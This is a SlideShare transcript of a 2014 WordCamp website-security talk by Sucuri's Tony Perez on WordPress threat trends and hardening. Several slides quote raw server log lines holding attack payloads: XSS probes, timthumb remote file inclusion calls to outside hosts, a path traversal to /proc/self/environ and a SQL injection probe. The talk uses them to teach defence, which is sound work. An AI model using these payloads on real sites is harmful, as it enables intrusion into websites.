SlideShare a Scribd company logo

WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security

Download as PPTX, PDF
Tony Perez
Tony Perez
Presentations & Public SpeakingTechnologyNews & Politics
1 of 55
Website Security (WordPress)
 Organization  Sucuri, Inc.  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Special Interests:  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security4/29/2014 2
 Website Security Company  GlobalOperations  PlatformAgnostic (i.e., Joomla,WordPress, etc..)  Scan 2M Unique Domains a Month  Block 4M web attacks a Month  Remediate 400 – 500 websites a day  Signature / Heuristic Based  24/7 operations 4/29/2014 Tony Perez | @perezbox | @sucuri_security 3
 Trends  Threats  Defenses 4/29/2014 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?
Tony Perez | @perezbox | @sucuri_security4/29/2014 5
4/29/2014 Tony Perez | @perezbox | @sucuri_security 6 Data Breaches (Millions) 2011 2013
MaliciousWebsites LegitimateWebsites 4/29/2014 Tony Perez | @perezbox | @sucuri_security 7
Not-Exploitable Exploitable 4/29/2014 Tony Perez | @perezbox | @sucuri_security 8 1 in 8 - CriticalVulnerability
26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 4/29/2014 Tony Perez | @perezbox | @sucuri_security 10
4/29/2014 Tony Perez | @perezbox | @sucuri_security 11
4/29/2014 Tony Perez | @perezbox | @sucuri_security 12
4/29/2014 Tony Perez | @perezbox | @sucuri_security 13 Darkleech Cdork (Apache) Ebury (SSH) Email Server (SPAM)  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a highly adaptive / sophistication Heartbleed (OpenSSL)
4/29/2014 Tony Perez | @perezbox | @sucuri_security 14
 Pharmacy  Payday Loans 4/29/2014 Tony Perez | @perezbox | @sucuri_security 16
4/29/2014 Tony Perez | @perezbox | @sucuri_security 17  ExploitingAccess Control
4/29/2014 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4 Cross-Site Contamination
4/29/2014 Tony Perez | @perezbox | @sucuri_security 19
4/29/2014 Tony Perez | @perezbox | @sucuri_security 20
4/29/2014 Tony Perez | @perezbox | @sucuri_security 21
4/29/2014 Tony Perez | @perezbox | @sucuri_security 22
4/29/2014 Tony Perez | @perezbox | @sucuri_security 23
4/29/2014 Tony Perez | @perezbox | @sucuri_security 24
4/29/2014 Tony Perez | @perezbox | @sucuri_security 25
4/29/2014 Tony Perez | @perezbox | @sucuri_security 26
 Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole ExploitAuthor Arrested 4/29/2014 Tony Perez | @perezbox | @sucuri_security 27
25% 22% 9% 1% 11% 5% 12% 10% 5%0% Neutrino Unknown Kit Redkit SweetOrange Styx Glazunov/Sibhost Nuclear Blackhole/Cool Other 4/29/2014 Tony Perez | @perezbox | @sucuri_security 28
4/29/2014 Tony Perez | @perezbox | @sucuri_security 29
4/29/2014 Tony Perez | @perezbox | @sucuri_security 30
4/29/2014 Tony Perez | @perezbox | @sucuri_security 31  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
4/29/2014 Tony Perez | @perezbox | @sucuri_security 32
4/29/2014 Tony Perez | @perezbox | @sucuri_security 33 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
4/29/2014 Tony Perez | @perezbox | @sucuri_security 34
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4/29/2014 Tony Perez | @perezbox | @sucuri_security 35
4/29/2014 Tony Perez | @perezbox | @sucuri_security 36 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
4/29/2014 Tony Perez | @perezbox | @sucuri_security 37
4/29/2014 Tony Perez | @perezbox | @sucuri_security 38
 http://blog.sucuri.net/2014/03/unmasking-free-premium- wordpress-plugins.html 4/29/2014 Tony Perez | @perezbox | @sucuri_security 39 - SEOPresser - Payload located: wp-content/plugins/seo-pressor(gratuit) - File: central.class.php - Flat Skins Pack Extension - Payload located: wp-content/restrict-content-pro/includes/ - File: sidebar.php - Restrict Content Pro - Paylaod located: wp-content/ubermenu-skins-flat
 Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 4/29/2014 Tony Perez | @perezbox | @sucuri_security 40
4/29/2014 Tony Perez | @perezbox | @sucuri_security 41
 Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 4/29/2014 Tony Perez | @perezbox | @sucuri_security 42
 Principles  Access Control  Vulnerabilities 4/29/2014 Tony Perez | @perezbox | @sucuri_security 43
“It’s about risk reduction… risk will never be zero…” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 44
“…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 45
 Passwords 4/29/2014 Tony Perez | @perezbox | @sucuri_security 46 Complex – Long - Unique
“requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 47
4/29/2014 Tony Perez | @perezbox | @sucuri_security 48  PHP Execution, disable it:  /wp-includes  /wp-content  /themes  /plugins  /uploads <Files *.php> Deny from all </Files>
 WP-CONFIG File Modification #Disable Plugin /Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 4/29/2014 Tony Perez | @perezbox | @sucuri_security 49
4/29/2014 Tony Perez | @perezbox | @sucuri_security 50
4/29/2014 Tony Perez | @perezbox | @sucuri_security 51 NOTTHAT HARD!!!!
4/29/2014 Tony Perez | @perezbox | @sucuri_security 52
4/29/2014 Tony Perez | @perezbox | @sucuri_security 53
4/29/2014 Tony Perez | @perezbox | @sucuri_security 54 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers Ideal implementations: 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database The Bare Minimum:
1. Fix index.php file and assume all is fine. 1. Panic your way into WordPress Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 55
4/29/2014 Tony Perez | @perezbox | @sucuri_security 56 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
4/29/2014 Tony Perez | @perezbox | @sucuri_security 57 Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security

Recommended

Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)
Tony Perez
 
Word press website security
Word press website securityWord press website security
Word press website securityTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
Tony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
Journalism toolkit
Journalism toolkitJournalism toolkit
Journalism toolkitArzu
 
Pressbooks: WordCamp Minneapolis 2013
Pressbooks: WordCamp Minneapolis 2013Pressbooks: WordCamp Minneapolis 2013
Pressbooks: WordCamp Minneapolis 2013
Nick Ciske
 
Plugin Monetization Options - WordCamp Minneapolis 2014
Plugin Monetization Options - WordCamp Minneapolis 2014Plugin Monetization Options - WordCamp Minneapolis 2014
Plugin Monetization Options - WordCamp Minneapolis 2014
Nick Ciske
 

Recommended

Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)
Tony Perez
 
Word press website security
Word press website securityWord press website security
Word press website securityTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
Tony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
Journalism toolkit
Journalism toolkitJournalism toolkit
Journalism toolkitArzu
 
Pressbooks: WordCamp Minneapolis 2013
Pressbooks: WordCamp Minneapolis 2013Pressbooks: WordCamp Minneapolis 2013
Pressbooks: WordCamp Minneapolis 2013
Nick Ciske
 
Plugin Monetization Options - WordCamp Minneapolis 2014
Plugin Monetization Options - WordCamp Minneapolis 2014Plugin Monetization Options - WordCamp Minneapolis 2014
Plugin Monetization Options - WordCamp Minneapolis 2014
Nick Ciske
 
A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
Tony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
Tony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
Tony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
Tony Perez
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
Tony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
Tony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
Tony Perez
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
Tony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Sebastiano Panichella
 
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
khadija278284
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
OECD Directorate for Financial and Enterprise Affairs
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
Sebastiano Panichella
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Orkestra
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
Vladimir Samoylov
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
Access Innovations, Inc.
 

More Related Content

More from Tony Perez

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
Tony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
Tony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
Tony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
Tony Perez
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
Tony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
Tony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
Tony Perez
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
Tony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 

More from Tony Perez (15)

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good Posture
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good Posture
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of Security
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser security
 

Recently uploaded

Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Sebastiano Panichella
 
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
khadija278284
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
OECD Directorate for Financial and Enterprise Affairs
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
Sebastiano Panichella
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Orkestra
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
Vladimir Samoylov
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
Access Innovations, Inc.
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
Howard Spence
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
IP ServerOne
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
OWASP Beja
 
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdfSupercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
Access Innovations, Inc.
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
Faculty of Medicine And Health Sciences
 
María Carolina Martínez - eCommerce Day Colombia 2024
María Carolina Martínez - eCommerce Day Colombia 2024María Carolina Martínez - eCommerce Day Colombia 2024
María Carolina Martínez - eCommerce Day Colombia 2024
eCommerce Institute
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Matjaž Lipuš
 
Media as a Mind Controlling Strategy In Old and Modern Era
Media as a Mind Controlling Strategy In Old and Modern EraMedia as a Mind Controlling Strategy In Old and Modern Era
Media as a Mind Controlling Strategy In Old and Modern Era
faizulhassanfaiz1670
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Sebastiano Panichella
 

Recently uploaded (16)

Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
 
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
 
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdfSupercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
Supercharge your AI - SSP Industry Breakout Session 2024-v2_1.pdf
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
 
María Carolina Martínez - eCommerce Day Colombia 2024
María Carolina Martínez - eCommerce Day Colombia 2024María Carolina Martínez - eCommerce Day Colombia 2024
María Carolina Martínez - eCommerce Day Colombia 2024
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
 
Media as a Mind Controlling Strategy In Old and Modern Era
Media as a Mind Controlling Strategy In Old and Modern EraMedia as a Mind Controlling Strategy In Old and Modern Era
Media as a Mind Controlling Strategy In Old and Modern Era
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
 

WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security

  • 2.  Organization  Sucuri, Inc.  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Special Interests:  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security4/29/2014 2
  • 3.  Website Security Company  GlobalOperations  PlatformAgnostic (i.e., Joomla,WordPress, etc..)  Scan 2M Unique Domains a Month  Block 4M web attacks a Month  Remediate 400 – 500 websites a day  Signature / Heuristic Based  24/7 operations 4/29/2014 Tony Perez | @perezbox | @sucuri_security 3
  • 4.  Trends  Threats  Defenses 4/29/2014 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?
  • 5. Tony Perez | @perezbox | @sucuri_security4/29/2014 5
  • 6. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 6 Data Breaches (Millions) 2011 2013
  • 8. Not-Exploitable Exploitable 4/29/2014 Tony Perez | @perezbox | @sucuri_security 8 1 in 8 - CriticalVulnerability
  • 10. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 11
  • 11. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 12
